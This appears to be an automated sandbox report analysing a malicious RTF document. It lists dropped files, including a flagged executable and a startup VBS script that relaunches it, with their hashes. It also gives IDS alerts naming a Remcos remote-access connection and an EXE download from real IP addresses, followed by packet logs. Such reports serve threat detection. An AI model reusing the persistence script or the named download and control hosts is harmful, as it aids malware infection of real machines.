Preview:	EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<\|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...\|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...\|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5

C:\Users\user\AppData\Local\Temp\bhv41C2.tmp

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0f970b0e, page size 32768, DirtyShutdown, Windows version 6.1
Category:	dropped
Size (bytes):	21037056
Entropy (8bit):	1.1390584590529897
Encrypted:	false
SSDEEP:	24576:AO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:AOEXs1LuHqqEXwPW+RHA6m1fN
MD5:	5418C6839F7CD3B7171E89FBAEF6A379
SHA1:	7F8BCF79876FB723ABE32119772F1E9692365F38
SHA-256:	C063B42CD96F73F78026A9A54109BD633082D4646B43FB55E812D91FBBE56B7B
SHA-512:	BD30A90F2504A78723A9C64EF188327D368220DE9DF2C0652BBF47B5C6194D982F2A6BAF3C3C9794EE233CDCC5542857DB6A70168BA68FD795A5F43CEBECAA40
Malicious:	false
Preview:	....... ........................u..............................;:...{..8....\|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\teres

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	4.437033064729596
Encrypted:	false
SSDEEP:	768:3B/xREbEXiee0eaPQjby+l5xB3FG60914KhOG7sDUjb6Rc1P:TubEXiegNl5xqbb4KhODUjbKqP
MD5:	8286378171E4C2B52782449814A06653
SHA1:	F950AEA27B1C5416406C248A41253679ED182BFA
SHA-256:	4DC4DEA969F1A530D82D02ED8D72BE00404F8E32973430DC55EAE380F95D92DA
SHA-512:	9B9B2A8BF2B8559EAFC93AE06A6C8C1D3D8ED074353D827CA04E0DE7E1FA5214BFAAF98F645114E826E898B0B9302AB16AAB18D9CA2443D7BC06574605D3EC85
Malicious:	false
Preview:	1z898cgf<1fefg032340688;b98e40123467:<8596e=662340129:8:6g<6cc:601234078;=56:;f87g340123:69;798bd<:512340189<95f;gbb8f40123467:<959ge<342340129:8:68=0c;6601234078;=4e;5fa3g340123:69;8995d;:412340189<957<:b:8f40123467:<8d::ee6d2340129:8:78=a45f467:<85:ee=6f2340129:8::g84ghijfgdd;412340189<9:77:fghijfc:9801234078;=866;jfghijb:8f40123467:<<d5cijfghifa7e340123:69;<94dhijfghe<2f2340129:8::88eghijfgd<:412340189<99f84fghijfcc9g01234078;=9675jfghijb98f40123467:<<566ijfghi73d;9:8::g96ghijfgdd;512340189<967g4b99640123467:<85e4e=662340129:8:6gh4cc:601234078;=56f9f845340123:69;79d9d<7212340189<95fgebb4h40123467:<95eee<652340129:8:68hec;9g01234078;=4eg3fa7e340123:69;89e356g078;=46g7f973340123:69;;h69hijfghee652340129:8:;8:aghijfgd;;612340189<9979gfghijfc;9501234078;=8e8hjfghijbb9340123467:<=582ijfghif87;340123:69;;973hijfghe=342340129:8::g;4ghijfgdd7212340189<9:7::fghijfc:5i01234078;=869;jfghijb:8740123467:<<d8cijfghifa7e340123:69;<97dhijfghe<6d2340129:8::8;eghijfg56g978;=4e:3fa85340123:69;89a1d;:8

C:\Users\user\AppData\Local\directory\name.exe

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290752
Entropy (8bit):	7.269682117155447
Encrypted:	false
SSDEEP:	24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
MD5:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
SHA1:	F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
SHA-256:	D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
SHA-512:	9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Joe Sandbox View:	Filename: BeeaCHpaO4.exe, Detection: malicious, Browse Filename: na.rtf, Detection: malicious, Browse Filename: PO-00006799868.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...\|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\WC5Gv13cOQ.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Sun Oct 13 04:28:54 2024, length=99712, window=hide
Category:	dropped
Size (bytes):	1014
Entropy (8bit):	4.558769417855851
Encrypted:	false
SSDEEP:	12:8qIFgXg/XAlCPCHaX0BbB/BGFX+WftTuoNVeicvbSp4j1ODtZ3YilMMEpxRljKLU:8qs/XTEBbkLq29emIODv3qmr57u
MD5:	922B3D8D827D95AA499295323C2D54D8
SHA1:	B48F9E56578022A726044F972AE15A069CDDD9E1
SHA-256:	BAADD07A8812F0ECEDE7ADED1C1FF79F8AD633FC04185F5446E4B568FFC7DA97
SHA-512:	442C4512651C84B0056EF099B9036716DF1EC66254E776F5E82042CA72FB33B9FA29977328670AA9B222439F6F3637F870D74342B0CA39753FF6A17C248FEBF7
Malicious:	false
Preview:	L..................F.... ...I3..r...I3..r....Az.0................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....MY.+..user.8......QK.XMY.+...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....MY.+ .WC5GV1~1.RTF..J.......WD..WD..........................W.C.5.G.v.1.3.c.O.Q...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\549163\Users.user\Desktop\WC5Gv13cOQ.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.W.C.5.G.v.1.3.c.O.Q...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......549163..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.749452668030777
Encrypted:	false
SSDEEP:	3:H5moBzjom4eBzjov:H5hBzjFBzjy
MD5:	9C54058E38AC0318AA31234A2EAEE6CF
SHA1:	0624E56F33BA72E002E8CCB7E8A6E20B8EC7C7E9
SHA-256:	4F98F4B07ED6158A77C9E27CC6231B3D144A63BC1CECD67B3D83B57BC0A40715
SHA-512:	3F4A7E57F4EADBBFFC012D1C1528E7B1265EF4650960EE758DB748405C6D078D9F15A3504452D82B5A48BA1DE4EAC520BAB812C90C04B6CB85E9F6006CCB1DB1
Malicious:	false
Preview:	[misc]..WC5Gv13cOQ.LNK=0..[folders]..WC5Gv13cOQ.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707526
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyRKybWKyz2dG/3WWGKbillfGgHV/ln:vdsCkWtSqA8Klp9l
MD5:	3B714FD719897409D1B398BF5847D05B
SHA1:	6866266D032B2AC31C26B78FF34AAA78B417B750
SHA-256:	54DDB7333353A41706EF18A71962EB2C4DC6FCBFB8EEB4D9DC7EC94C15B7E49C
SHA-512:	D0C3FD1795359BBA85FDD83CFB9D9859CD9E1B74BEB72EF1EDEE5E9A76931E1A3EFAE38807AEC6B4049532369B41F9A58FB0270AB07CE0B8DC55740E00607840
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	3.432515153875934
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcltr1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlZ1Q1A1z4mA2n
MD5:	56B963F73C0E43390FF3FF4D7A017676
SHA1:	3B13AC1CF25CDDF48309FC03DAE0C21E501BE72D
SHA-256:	894FD00EC8DF7058794232AEEB64467BC91FE4009F18FA1407E09E92444A9EE0
SHA-512:	38D55BAD2C2EB6C764D036238AC2E220B9444C98F41857799C2316B25AC8BB6C4500E43D362DFFFDF7583858D7C553CF2F11D38962F0BBEC7618B6FA6C71F9F8
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Users\user\AppData\Roaming\taskhostw.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290752
Entropy (8bit):	7.269682117155447
Encrypted:	false
SSDEEP:	24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
MD5:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
SHA1:	F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
SHA-256:	D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
SHA-512:	9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Joe Sandbox View:	Filename: BeeaCHpaO4.exe, Detection: malicious, Browse Filename: na.rtf, Detection: malicious, Browse Filename: PO-00006799868.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...\|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$5Gv13cOQ.rtf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707526
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyRKybWKyz2dG/3WWGKbillfGgHV/ln:vdsCkWtSqA8Klp9l
MD5:	3B714FD719897409D1B398BF5847D05B
SHA1:	6866266D032B2AC31C26B78FF34AAA78B417B750
SHA-256:	54DDB7333353A41706EF18A71962EB2C4DC6FCBFB8EEB4D9DC7EC94C15B7E49C
SHA-512:	D0C3FD1795359BBA85FDD83CFB9D9859CD9E1B74BEB72EF1EDEE5E9A76931E1A3EFAE38807AEC6B4049532369B41F9A58FB0270AB07CE0B8DC55740E00607840
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	2.6442487646836392
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	WC5Gv13cOQ.rtf
File size:	99'712 bytes
MD5:	904af9fb7e5bee74577f430af1080585
SHA1:	71b79e6f053b89985d109d81670f2dce172775ae
SHA256:	98bcb2a98c5347e4409349f1605a7883a40a541cffc4aa62bf7c77b5160cdd20
SHA512:	bea7087cc00f169433e00f1ca03b07b37eb0a9299ad406e551d840021c47ae29aea0ef5c25cd168bc74812de6395f6c83f40f356e8108d78cbb238bf33455316
SSDEEP:	768:czOjyekZVi0QtGJPKrEvK64F5nMn10Me3Ffp8w:HvoetGJid6K5nmW3Fp8w
TLSH:	13A3684CA78F45A5CF54A27703260A8858FCBB3EB70112B6745C937137EDC2D45A96BC
File Content Preview:	{\rtf1..{\\2BxdVMroWtlv6nMMH1ia2gB1PklHtlYb50ZYZngz42zIp5DlDnaKiulawX8r86LojH5zIT1ufI8BHODztbdoRDLKAXAe}..{\890949244:?84!_;8]@#!??89?%4?._\|:.[[.72/.0%[<+=@??0%%~!]'%'!%10?=_?.5?&/.3<6?()%?-.&>#%<..[']8.!>>0<$/+.*0,?.-$5%.[;8)0)???[4=&3<`~21?9:<45\|].@5!

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00001C6Bh								no

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T07:28:59.168544+0200	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	1	104.168.7.25	80	192.168.2.22	49161	TCP
2024-10-13T07:28:59.282925+0200	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	1	104.168.7.25	80	192.168.2.22	49161	TCP
2024-10-13T07:29:04.453432+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.22	49162	107.173.4.16	2404	TCP
2024-10-13T07:29:05.537882+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.22	49163	178.237.33.50	80	TCP
2024-10-13T07:29:05.555031+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.22	49164	107.173.4.16	2404	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 07:28:58.674171925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:58.679136038 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:58.679195881 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:58.679474115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:58.684293032 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.167737007 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.167910099 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.167929888 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.168019056 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.168020010 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.168544054 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.168561935 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.168603897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.168603897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.169558048 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.169578075 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.169625998 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.169625998 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.169625998 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.170545101 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.170563936 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.170701027 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.170701981 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.171502113 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.171816111 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.173748970 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.174245119 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.174300909 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.175295115 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.175313950 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.175375938 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.175376892 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.258184910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.258258104 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.258563042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.258630037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.258846998 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.258871078 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.259021997 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.259021997 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.263097048 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.263282061 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.263667107 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.263689995 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.263861895 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.263863087 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.264339924 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.264364004 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.264400959 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.265221119 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.268079042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.268136978 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.268362045 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.268385887 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.268543959 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.268543959 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.269399881 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.269458055 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.272893906 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.272953033 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.273274899 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.273319960 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.273365021 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.273490906 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.273490906 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.273490906 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.274204969 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.274259090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.277734041 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.277789116 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.278072119 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.278095961 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.278261900 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.278263092 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.279033899 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.279093981 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.282540083 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.282598972 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.282924891 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.282947063 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.283104897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.283104897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.348881006 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.349103928 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.349124908 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.349219084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.349219084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.349220037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.349565029 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.349786043 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.354051113 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.354072094 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.354396105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.354651928 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.354666948 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.354835987 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.358772039 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.358788013 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.358848095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.358848095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.359448910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.359466076 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.359493017 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.359545946 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.359545946 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.363595009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.363615990 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.363666058 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.363698006 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.364226103 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.364247084 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.364280939 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.364280939 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.368352890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.368371964 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.368400097 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.368413925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.368413925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.368443012 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.368961096 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.368980885 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.369019032 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.369189978 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.373101950 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.373142958 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.373181105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.373503923 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.373668909 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.373687983 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.373728037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.373728037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.377880096 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.377898932 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.377924919 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.377939939 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.377975941 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.377976894 CEST	49161	80	192.168.2.22	104.168.7.25
